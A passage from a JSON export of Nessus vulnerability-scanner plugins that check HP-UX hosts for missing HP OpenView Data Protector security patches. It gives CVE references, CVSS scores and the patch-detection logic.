script_cwe_id(119, 189);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:hp:hp-ux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/12/08\");\n 
script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/12/14\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2018 Tenable Network Security, Inc.\");\n script_family(english:\"HP-UX Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/HP-UX/version\", \"Host/HP-UX/swlist\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"hpux.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/HP-UX/version\")) audit(AUDIT_OS_NOT, \"HP-UX\");\nif (!get_kb_item(\"Host/HP-UX/swlist\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nif (!hpux_check_ctx(ctx:\"11.00 11.11 11.23\", proc:\"parisc\"))\n{\n exit(0, \"The host is not affected since PHSS_37382 applies to a different OS release / architecture.\");\n}\n\npatches = make_list(\"PHSS_37382\", \"PHSS_38722\");\nforeach patch (patches)\n{\n if (hpux_installed(app:patch))\n {\n exit(0, \"The host is not affected because patch \"+patch+\" is installed.\");\n }\n}\n\n\nflag = 0;\nif (hpux_check_patch(app:\"DATA-PROTECTOR.OMNI-CORE-IS\", version:\"A.05.50\")) flag++;\nif (hpux_check_patch(app:\"DATA-PROTECTOR.OMNI-FRA-LS-P\", version:\"A.05.50\")) flag++;\nif (hpux_check_patch(app:\"DATA-PROTECTOR.OMNI-INTEG-P\", version:\"A.05.50\")) flag++;\nif (hpux_check_patch(app:\"DATA-PROTECTOR.OMNI-JPN-LS-P\", version:\"A.05.50\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:hpux_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-12-13T07:50:54", "bulletinFamily": "scanner", "description": "s700_800 11.23 OV DP5.50 IA-64 patch - CS packet : \n\nThe remote HP-UX host is affected by multiple 
vulnerabilities :\n\n - Potential security vulnerabilities have been identified\n with HP OpenView Storage Data Protector running on\n HP-UX, Windows, Linux and Solaris. These vulnerabilities\n could be exploited remotely to execute arbitrary code.\n (HPSBMA02252 SSRT061258, SSRT061259)\n\n - A potential security vulnerability has been identified\n with OpenView Data Protector Application Recovery\n Manager version 5.5 and 6.0. The vulnerability could be\n exploited remotely to create a denial of service (DoS).\n (HPSBMA02481 SSRT090113)", "modified": "2019-12-02T00:00:00", "id": "HPUX_PHSS_36800.NASL", "href": "https://www.tenable.com/plugins/nessus/43139", "published": "2009-12-14T00:00:00", "title": "HP-UX PHSS_36800 : s700_800 11.23 OV DP5.50 IA-64 patch - CS packet", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and patch checks in this plugin were \n# extracted from HP patch PHSS_36800. The text itself is\n# copyright (C) Hewlett-Packard Development Company, L.P.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(43139);\n script_version(\"1.18\");\n script_cvs_date(\"Date: 2018/07/12 19:01:15\");\n\n script_cve_id(\"CVE-2007-2280\", \"CVE-2007-2281\", \"CVE-2009-3844\");\n script_xref(name:\"TRA\", value:\"TRA-2009-04\");\n script_xref(name:\"HP\", value:\"emr_na-c01124817\");\n script_xref(name:\"HP\", value:\"emr_na-c01943909\");\n script_xref(name:\"HP\", value:\"SSRT061258\");\n script_xref(name:\"HP\", value:\"SSRT061259\");\n script_xref(name:\"HP\", value:\"SSRT090113\");\n\n script_name(english:\"HP-UX PHSS_36800 : s700_800 11.23 OV DP5.50 IA-64 patch - CS packet\");\n script_summary(english:\"Checks for the patch in the swlist output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote HP-UX host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"s700_800 11.23 OV DP5.50 IA-64 patch - CS packet : 
\n\nThe remote HP-UX host is affected by multiple vulnerabilities :\n\n - Potential security vulnerabilities have been identified\n with HP OpenView Storage Data Protector running on\n HP-UX, Windows, Linux and Solaris. These vulnerabilities\n could be exploited remotely to execute arbitrary code.\n (HPSBMA02252 SSRT061258, SSRT061259)\n\n - A potential security vulnerability has been identified\n with OpenView Data Protector Application Recovery\n Manager version 5.5 and 6.0. The vulnerability could be\n exploited remotely to create a denial of service (DoS).\n (HPSBMA02481 SSRT090113)\"\n );\n script_set_attribute(attribute:\"see_also\", value:\"https://www.tenable.com/security/research/tra-2009-04\");\n # http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01124817\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?5bd45cd2\"\n );\n # http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01943909\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?0a593fc9\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Install patch PHSS_36800 or subsequent.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'HP OmniInet.exe MSG_PROTOCOL Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'White_Phosphorus');\n script_cwe_id(119, 189);\n\n script_set_attribute(attribute:\"plugin_type\", 
value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:hp:hp-ux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/12/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/12/14\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2018 Tenable Network Security, Inc.\");\n script_family(english:\"HP-UX Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/HP-UX/version\", \"Host/HP-UX/swlist\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"hpux.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/HP-UX/version\")) audit(AUDIT_OS_NOT, \"HP-UX\");\nif (!get_kb_item(\"Host/HP-UX/swlist\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nif (!hpux_check_ctx(ctx:\"11.23\", proc:\"ia64\"))\n{\n exit(0, \"The host is not affected since PHSS_36800 applies to a different OS release / architecture.\");\n}\n\npatches = make_list(\"PHSS_36800\", \"PHSS_37828\", \"PHSS_38727\");\nforeach patch (patches)\n{\n if (hpux_installed(app:patch))\n {\n exit(0, \"The host is not affected because patch \"+patch+\" is installed.\");\n }\n}\n\n\nflag = 0;\nif (hpux_check_patch(app:\"DATA-PROTECTOR.OMNI-CS\", version:\"A.05.50\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:hpux_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-12-13T07:50:54", "bulletinFamily": "scanner", "description": "s700_800 11.X OV DP6.00 IA-64 patch - CORE packet : \n\nThe remote HP-UX host is affected by multiple vulnerabilities :\n\n - A potential security vulnerability has been identified\n with OpenView 
Data Protector Application Recovery\n Manager version 5.5 and 6.0. The vulnerability could be\n exploited remotely to create a denial of service (DoS).\n (HPSBMA02481 SSRT090113)\n\n - Potential security vulnerabilities have been identified\n with HP OpenView Storage Data Protector running on\n HP-UX, Windows, Linux and Solaris. These vulnerabilities\n could be exploited remotely to execute arbitrary code.\n (HPSBMA02252 SSRT061258, SSRT061259)", "modified": "2019-12-02T00:00:00", "id": "HPUX_PHSS_36623.NASL", "href": "https://www.tenable.com/plugins/nessus/43137", "published": "2009-12-14T00:00:00", "title": "HP-UX PHSS_36623 : s700_800 11.X OV DP6.00 IA-64 patch - CORE packet", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and patch checks in this plugin were \n# extracted from HP patch PHSS_36623. The text itself is\n# copyright (C) Hewlett-Packard Development Company, L.P.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(43137);\n script_version(\"1.20\");\n script_cvs_date(\"Date: 2018/07/12 19:01:15\");\n\n script_cve_id(\"CVE-2007-2280\", \"CVE-2007-2281\", \"CVE-2009-3844\");\n script_xref(name:\"TRA\", value:\"TRA-2009-04\");\n script_xref(name:\"HP\", value:\"emr_na-c01124817\");\n script_xref(name:\"HP\", value:\"emr_na-c01943909\");\n script_xref(name:\"HP\", value:\"SSRT061258\");\n script_xref(name:\"HP\", value:\"SSRT061259\");\n script_xref(name:\"HP\", value:\"SSRT090113\");\n\n script_name(english:\"HP-UX PHSS_36623 : s700_800 11.X OV DP6.00 IA-64 patch - CORE packet\");\n script_summary(english:\"Checks for the patch in the swlist output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote HP-UX host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"s700_800 11.X OV DP6.00 IA-64 patch - CORE packet : \n\nThe remote HP-UX host is affected by multiple vulnerabilities :\n\n - A potential security 
vulnerability has been identified\n with OpenView Data Protector Application Recovery\n Manager version 5.5 and 6.0. The vulnerability could be\n exploited remotely to create a denial of service (DoS).\n (HPSBMA02481 SSRT090113)\n\n - Potential security vulnerabilities have been identified\n with HP OpenView Storage Data Protector running on\n HP-UX, Windows, Linux and Solaris. These vulnerabilities\n could be exploited remotely to execute arbitrary code.\n (HPSBMA02252 SSRT061258, SSRT061259)\"\n );\n script_set_attribute(attribute:\"see_also\", value:\"https://www.tenable.com/security/research/tra-2009-04\");\n # http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01124817\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?5bd45cd2\"\n );\n # http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01943909\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?0a593fc9\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Install patch PHSS_36623 or subsequent.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'HP OmniInet.exe MSG_PROTOCOL Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'White_Phosphorus');\n script_cwe_id(119, 189);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:hp:hp-ux\");\n\n 
script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/12/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/12/14\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2018 Tenable Network Security, Inc.\");\n script_family(english:\"HP-UX Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/HP-UX/version\", \"Host/HP-UX/swlist\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"hpux.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/HP-UX/version\")) audit(AUDIT_OS_NOT, \"HP-UX\");\nif (!get_kb_item(\"Host/HP-UX/swlist\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nif (!hpux_check_ctx(ctx:\"11.23 11.31\", proc:\"ia64\"))\n{\n exit(0, \"The host is not affected since PHSS_36623 applies to a different OS release / architecture.\");\n}\n\npatches = make_list(\"PHSS_36623\", \"PHSS_37174\", \"PHSS_37817\", \"PHSS_38403\", \"PHSS_38742\", \"PHSS_38944\", \"PHSS_39016\", \"PHSS_39731\", \"PHSS_40080\", \"PHSS_40563\", \"PHSS_41262\", \"PHSS_41867\");\nforeach patch (patches)\n{\n if (hpux_installed(app:patch))\n {\n exit(0, \"The host is not affected because patch \"+patch+\" is installed.\");\n }\n}\n\n\nflag = 0;\nif (hpux_check_patch(app:\"DATA-PROTECTOR.OMNI-CORE-IS\", version:\"A.06.00\")) flag++;\nif (hpux_check_patch(app:\"DATA-PROTECTOR.OMNI-INTEG-P\", version:\"A.06.00\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:hpux_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}